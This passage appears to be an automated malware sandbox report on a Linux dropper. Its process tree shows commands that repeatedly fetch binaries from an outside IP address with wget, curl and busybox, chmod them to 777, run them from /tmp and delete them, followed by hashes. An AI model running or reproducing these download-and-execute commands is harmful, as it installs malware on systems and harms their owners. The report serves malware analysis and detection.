PID:938
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:942
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:948
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:954
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:960
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:966
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:972
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:978
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:981
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97